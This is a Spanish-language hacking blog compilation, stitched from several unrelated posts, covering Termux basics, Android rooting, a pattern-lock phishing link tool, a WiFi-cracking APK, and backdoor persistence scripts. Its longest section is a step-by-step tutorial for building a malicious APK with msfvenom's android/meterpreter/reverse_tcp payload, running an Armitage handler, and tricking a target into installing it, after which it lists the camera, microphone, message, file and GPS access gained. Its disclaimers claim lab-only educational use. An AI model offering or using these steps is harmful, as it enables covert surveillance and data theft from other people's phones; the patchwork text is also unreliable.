hacklock es una herramienta que utiliza el servidor ngrok para brindar un enlace phishing, el cual contiene una plantilla del patrón de desbloqueo de dispositivos móviles, y de ésta forma obtener el patrón de desbloqueo del dispositivo de un objetivo con un poco de ingeniería social.
RootTH es una herramienta que utiliza "proot" para falsificar el root y así obtener los privilegios de raíz en la terminal "Termux" sin necesidad de tener rooteado nuestro dispositivo android.
Todo depende del modelo de smartphone que quieras rootear.
En pocas palabras, echemos un vistazo a algunas verdades generales, bueno, no tan generales después de todo:
💢Los móviles Samsung se rootean con el software adecuado. Llamado Odin, viene en diferentes versiones dependiendo del dispositivo: Raíz de Android: descarga Odin 1.85, 3.04, 3.07, 3.09 (todas las versiones).
💢 Los teléfonos inteligentes HTC, Sony y LG requieren el desbloqueo del gestor de arranque, de acuerdo con los procedimientos oficiales, pero esto anula la garantía. Dicho esto, existen métodos que permiten rootear sin desbloquear el cargador de arranque para algunos dispositivos.
💢Los teléfonos inteligentes Nexus / Pixel son particularmente fáciles de desbloquear y la comunidad que los rodea garantiza métodos de enraizamiento relativamente fáciles y regulares con cada nueva versión del sistema operativo.
💢Los modelos chinos son generalmente fáciles de rootear, pero las reglas de privacidad relativa a veces pueden ser un lastre. De repente, los desarrolladores de la comunidad le prestan menos atención.
Afortunadamente para otros usuarios, los menos geek, algunos desarrolladores ofrecen regularmente pequeños programas que le permiten otorgar derechos de root con un solo clic o casi, desde Windows o desde cualquier otro lugar.
Precauciones y pasos a seguir antes de rootear😈
Recuerde que lo primero que debe hacer es hacer una copia de seguridad de todos sus datos. Guarda tus fotos, videos, contactos y archivos de todo tipo, estés donde estés en tu PC o vía servicios en la nube, para que no se pierdan durante el proceso. Algunos teléfonos inteligentes también necesitan desbloquear el gestor de arranque y no permiten que se obtengan permisos de root sin desbloquearlo primero.
❇️ ¿Recibiré actualizaciones oficiales después de rootear? ❇️
Si y no. Un dispositivo rooteado no recibirá actualizaciones OTA (Over The Air) que ocurren con una notificación enviada directamente desde el Centro de Actualización. Esto no quita el hecho de que puede instalar actualizaciones de software manualmente.
Termux es un emulador de terminal Android y una aplicación de entorno Linux que funciona directamente sin necesidad de enrutamiento o configuración. Se instala automáticamente un sistema base mínimo: hay paquetes adicionales disponibles utilizando el administrador de paquetes APT. no hay necesidad de usar root para su uso, lo que hace que sea uno de los emuladores mas usados del mercado.
Apenas lo instales, debes poner lo siguiente:
termux-setup-storage
apt update && apt upgrade -y
Comandos básicos:
apt - package manager
mkdir - crear carpetas
clear - limpiar la terminal
ls - enlistar los archivos/carpetas
cd - ir a una ruta
pwd - ver en qué ruta te encuentras
rm - borrar archivos/carpetas
apt update
Actualiza la lista de paquetes disponibles. Estos comandos deben ejecutarse inicialmente directamente después de la instalación y regularmente después para recibir actualizaciones .
apt search <query>
Buscar entre los paquetes disponibles.
apt install <package>
Instale un paquete nuevo.
apt upgrade
Actualiza paquetes obsoletos. Para que Apt pueda conocer los paquetes más nuevos, deberá actualizar el índice del paquete, por lo que normalmente querrá ejecutar apt update antes de actualizar.
apt show <package>
Mostrar información sobre un paquete.
apt list
Enumera todos los paquetes disponibles.
apt list --installed
Enumera todos los paquetes instalados.
apt remove <package>
Eliminar un paquete instalado
Apt como administrador de paquetes usa un formato de paquete llamado dpkg. Normalmente, el uso directo de dpkg no es necesario, pero los siguientes dos comandos pueden ser útiles:
dpkg -L <package>
Lista de archivos instalados de un paquete.
dpkg --verify
Verifique la integridad de los paquetes instalados.
Ver la página del manual apt (ejecutar apt install man para instalar primero un visor de páginas man) para más información.
DISCLAIMER: ESTE ES EL ÚNICO SITIO EN EL CUAL VAS A ENCONTRAR LA APK SIN TANTO ROLLO, PERO PARA PODER DESCARGARLA ES NECESARIO QUE TE SUSCRIBAS AL BLOG ARRIBA EN EL BOTÓN AZUL QUE DICE SEGUIR. ESTO ES NECESARIO PARA PODER DESCARGAR CUALQUIER APK O PROGRAMA EN EL BLOG. GRACIAS DE ANTEMANO.
Estas cansado de intentar con termux y que no te salga el cuento del hacking? Pues hoy te traigo otro post para noobs. en esta ocasión te traigo una Apk llamada wifi acces, la cual te permitirá abrir redes wifi despues de instalarla en tu celular con sistema operativo Android.
Es tan fácil como descargarla a tu cel, instalarla, abrirla y pulsar sobre las redes wifi que estan en verde y esperar. Tarde que temprano empezarás a abrir redes wifi a tu alrededor de una manera fácil y sin problemas de tener que instalar cosas que no sabes y puedan afectar tu cel de manera completa.
Esta es la manera más fácil que encontrarás de hackear redes wifi desde tu celular. No hay un tutorial mas facil que este y no lo vas a encontrar en internet, nadie te ofrecerá algo más intuitivo. Así que por favor, comenta si te sirvió y comparte el artículo en redes sociales.
OJO: Para que esta aplicación funcione, necesitas tener root en su celular.
INSTALACIÓN
Tan fácil como descarga e instala en tu celular. Deberás activar la función de admitir aplicaciones de terceros.
Este archivo automatiza todo el proceso de piratería de Android en Termux. También se puede usar en Kali Linux y Ubuntu con pocas ediciones en el código fuente. Para usar eso, ejecute los scripts de esta manera.
Una vez que finalice la instalación, no necesita ejecutar el script de instalación nuevamente.
Para crear una nueva carga útil, ejecute el script ./create-payload.sh
Para atacar solo ejecute los scripts en este formato.
./serveo-connect.sh ./attack.sh
Hacer persistente la carga útil --------
Después de eso, debe ingresar al directorio raíz del dispositivo Android escribiendo "cd /" en la terminal.
Ahora necesita acceder a la ubicación / sdcard escribiendo "cd / sdcard" en el mismo terminal.
Aquí puede cargar su secuencia de comandos backdoored escribiendo "upload persistent.sh" en la misma terminal.
Ahora todo lo que tenemos que hacer es ejecutar el script una vez, y luego todo se hará automáticamente, escriba "shell" para ingresar al modo shell del sistema del dispositivo Android.
Aquí debe volver a la misma ubicación, es decir, cd / root / sdcard y ejecutar la puerta trasera utilizando "nohup sh persistent.sh".
Su secuencia de comandos se ejecutó correctamente, puede finalizar la ejecución presionando CTRL + C y luego escriba Y.
HackDroid es una colección de más de 250 aplicaciones de pruebas de penetración y piratería ética para Android. en esto, las aplicaciones se divide en diferentes categorías para que pueda descargar cualquier aplicación de cualquier categoría y usarla.
INTERNET GRATIS OI VIVO CLARO TIM EHI 2018 COMO TER INTERNET DE GRAÇA 3g h+ 4g HTTP INJECTOR ANONYTUN PSIPHON KPN REVOLUTION VOLTAR FAZER COMO CRIAR PAYLOAD ARQUIVO EHI INFINITA HOST APN PROXY SSH VPN VPS NOVOS MÉTODOS TODAS OPERADORAS CELULAR
Apps net free do canal no momento : http injector brand vpn anonytun e web tunnel . Arquivo Brand Vpn e HTTP Injector Sem Data de Validade (Para Sempre)
Metodo Internet Gratis sem app dados patrocinados Vivo Ads (Legalmente) Método de Criar Payload na Vivo. Confiram !!
Hola todos los lectores del blog y bienvenidos a un nuevo tutorial donde se explica, a manera muy gráfica, como es posible con solo una IP hackear un teléfono android. Esto con ayuda del programa de libre acceso y disponible en github Phonesploit, el cual nos ayudará a detectar teléfonos e inclusive a acceder a ellos de ser necesario.
Cabe recordar que el uso de esta herramienta es educativo y nunca debe usarse con fines delictivos o malignos. ya enterados de esto continuamos con el videotutorial de como hackear un celular con sistema operativo android solo con la IP.
¡Bienvenidos a nuestro tutorial de hacking legal en español! En este artículo, les enseñaremos cómo hackear cualquier celular, tablet o dispositivo Android utilizando las herramientas de Armitage y Msfvenom con el método del .apk Falso.
Antes de comenzar, queremos aclarar que este tutorial es para fines educativos y legales solamente. No nos hacemos responsables del mal uso de esta información. Además, es importante tener en cuenta que el hacking ético es una habilidad valiosa que puede ser utilizada para mejorar la seguridad en línea y proteger a las personas y empresas de los ataques malintencionados.
Con eso dicho, ¡vamos a empezar!
Paso 1: Configuración de Armitage
Lo primero que necesitamos es configurar Armitage, una herramienta de hacking que nos permitirá escanear y atacar dispositivos Android. Para ello, necesitamos instalar Kali Linux en nuestro sistema operativo.
Una vez que hayamos instalado Kali Linux, abrimos Armitage y seleccionamos "Agregar host" para agregar el dispositivo que queremos atacar. Ingresamos la dirección IP del dispositivo y presionamos "Agregar host".
Paso 2: Creación de .apk Falso
El siguiente paso es crear un archivo .apk Falso que pueda ser descargado e instalado en el dispositivo objetivo. Para ello, utilizaremos Msfvenom, una herramienta de creación de exploits.
En la terminal de Kali Linux, ingresamos el siguiente comando:
Este comando creará un archivo .apk Falso con el nombre que hayas especificado. Este archivo será nuestro exploit que utilizaremos para hackear el dispositivo objetivo.
Paso 3: Ataque
Una vez que hayamos creado el archivo .apk Falso, lo cargamos en Armitage y lo enviamos al dispositivo objetivo. Si el dispositivo es vulnerable, el exploit se ejecutará y nos dará acceso al sistema.
En este punto, podemos explorar el sistema y hacer lo que queramos, desde acceder a los archivos y la información almacenada en el dispositivo, hasta instalar software malicioso y robar datos sensibles.
Conclusión
¡Felicidades! Ahora sabes cómo hackear cualquier dispositivo Android utilizando Armitage y Msfvenom con el método del .apk Falso. Recuerda que esto es sólo para fines educativos y legales. Es importante utilizar estas herramientas de manera ética y responsable.
Esperamos que este tutorial haya sido útil para ti. Si tienes alguna pregunta o comentario, no dudes en dejarlo en la sección de comentarios a continuación. ¡Nos encantaría saber de ti y crear una comunidad de hackers éticos en español!
Disclaimer:
Toda actividad de hacking o pentesting, bug bounty o seguridad informática que se realiza en el blog, es realizado en un entorno controlado elaborado por el admin del blog, con permisos para cada acción realizada y sobre cada equipo utilizado, ya que se han adquirido de forma legal para este propósito. En ningún momento se instiga o incentiva a las personas que ven este tutorial a realizar hackeos a equipos sobre los cuales no poseen permisos de manejo o modificación, ya que esto puede conllevar a acciones penales e inclusive, a acciones judiciales en contra del hacker que realice estas acciones.
Este tutorial es realizado como practica con el único propósito de mostrar a las personas como es que los hackers realizan estas acciones, pero con el fin de que las potenciales víctimas no caigan en este tipo de engaños y o acciones ilegales y que puedan enfrentarse a ellos para evitar perder sus cuentas de redes sociales y| o información personal.
En esta ocasión el blog se enorgullece en presentar un tutorial completo sobre una de las técnicas mas factibles para hackear un celular o un dispositivo cuyo sistema operativo sea android. Para ello lo que haremos es que, a través de armitage y Msfvenom, dos programas gratuitos que viene en las distribuciones de análisis de seguridad como kali o parrot.
1) inicialización del entorno de ataque
Lo primero que haremos para poder realizar nuestra práctica es reconocer a nuestro objetivo. Dado que el blog tiene una política de 100% legalidad, todas las prácticas aquí realizadas se realizaron con dispositivos propios del autor y desde un laboratorio de pentesting generado exactamente con el fin de realizar pruebas legales. Sin mas preámbulos, empecemos con el tutorial.
Primero que nada y para que funcione el armitage, inicializaremos el postgresql con la siguiente orden en distribuciones linux basadas en debian en una nueva consola:
service postgresql start
luego inicializaremos armitage con la orden desde la consola también:
armitage
Esto inicializará el armitage. Por el momento lo dejamos quieto mientras trabajamos con el msfvenom
2) creamos el Apk maligno con Msfvenom
Para ello, abrimos una nueva consola y tecleamos:
msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=8888 R >/root/Escritorior/nombredenuestroapkmaligno.apk
donde:
msfvenom : inicializa msfvenom
android/meterpreter/reverse_tcp: creamos una conexion tcp reversa para saltarnos los protocolos de seguridad de la maquina objetivo.
lhost: La dirección IP de nuestro localhost. En una red local es la interna. Para ataques a un dispositivo fuera de la red LAN utilizar la ip publica.
lport: el puerto local donde recibiremos la conexion. este debe estar abierto en la maquina objetivo para poder realizar el ataque.
/root/Escritorior/nombredenuestroapkmaligno.apk : La ruta y el nombre del archivo a guardar.
3) Creamos el handler (El servidor de nuestro lado)
Luego vamos al armitage y en los ataques de la izquierda buscamos android/meterpreter/reverse_tcp, con lo cual se abrirá una pequeña ventana donde ingresaremos el localhost y el puerto local de nuevo. OJO que estos coincidan con los que creamos en el archivo de msfvenom o no servirá el ataque, ojito y recordadlo. Esto lo que hará es inicializar el handler a la escucha de una posible conexión, la cual crearemos enviando el apk maligno al dispositivo con android.
Recordatorio: este ataque sirve para android hasta el 5.1, de ahi en adelante es un poco mas difícil hacerlo, pero también es posible. Eso lo dejaremos para un próximo tutorial.
4) instalar el apk maligno en el dispositivo
Aquí entra el paso de instalar el apk maligno en el dispositivo remoto objetivo. Aqui es facil ya que es un celular de mi propiedad, pero para hacerlo en otro celular deberás recurrir a toda clase de triquiñuelas extrañas para que te lo reciban, desactiven los protocolos de seguridad y lo instalen en su celular ( ya la seguridad ha avanzado mucho, eh?).
Una vez que esto suceda, ganaremos meterpreter en el dispositivo objetivo, lo cual nos dará potencialmente:
- El pase para poder ganar permisos de administración y así mismo, persistencia.
- acceso a dispositivos perimetrales como cámaras, micrófonos, auriculares, etc.
- Acceso a todos los archivos del celular, incluidas, fotos, conversaciones de whatsapp, y mensajes de texto.
- Permisos de añadir, borrar o modificar archivos
- posición gps del objetivo
Y hasta aquí el tutorial de hoy. No se explicará la persistencia en este momento, pero por lo pronto estos son los básicos de un hackeo de celular mediante la técnica del apk maligno. Recuerda que este es el hilo de la conversación sobre este tema en el blog y que cualquier pregunta que pongas en los comentarios la resolveremos entre todos los lectores y por supuesto su servidor, freakbizarro. Hasta la próxima.
